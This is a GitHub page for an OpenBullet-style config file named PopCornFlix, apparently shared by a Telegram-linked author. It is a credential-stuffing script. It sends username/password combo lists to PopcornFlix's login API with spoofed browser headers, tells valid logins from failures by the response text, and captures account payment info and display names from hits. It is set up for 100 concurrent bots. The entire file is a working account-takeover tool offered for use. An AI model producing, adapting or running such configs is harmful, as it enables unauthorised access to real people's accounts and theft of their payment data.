-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathPopCornFlix.loli
More file actions
65 lines (60 loc) · 2.07 KB
/
Copy pathPopCornFlix.loli
File metadata and controls
65 lines (60 loc) · 2.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
[SETTINGS]
{
"Name": "PopCornFlix",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2023-11-22T21:34:55.0143516+03:30",
"AdditionalInfo": "https://t.me/BeyondOrbit",
"RequiredPlugins": [],
"Author": "@BeyondOrbit",
"Version": "1.2.2",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://api.unreel.me/v2/me/auth/login?__site=popcornflix&__source=web"
CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"site\":\"popcornflix\"}"
CONTENTTYPE "application/json"
HEADER "Host: api.unreel.me"
HEADER "Connection: keep-alive"
HEADER "Content-Length: 98"
HEADER "Pragma: no-cache"
HEADER "Cache-Control: no-cache"
HEADER "Accept: application/json, text/plain, */*"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
HEADER "Origin: https://www.popcornflix.com"
HEADER "Sec-Fetch-Site: cross-site"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Referer: https://www.popcornflix.com/login"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8"
KEYCHECK
KEYCHAIN Failure OR
KEY "Incorrect email or password"
KEYCHAIN Success OR
KEY "token"
#PaymentInfo PARSE "<SOURCE>" JSON "creatorPaymentInfo" CreateEmpty=FALSE -> CAP "PaymentInfo"
#displayName PARSE "<SOURCE>" JSON "displayName" CreateEmpty=FALSE -> CAP "displayName"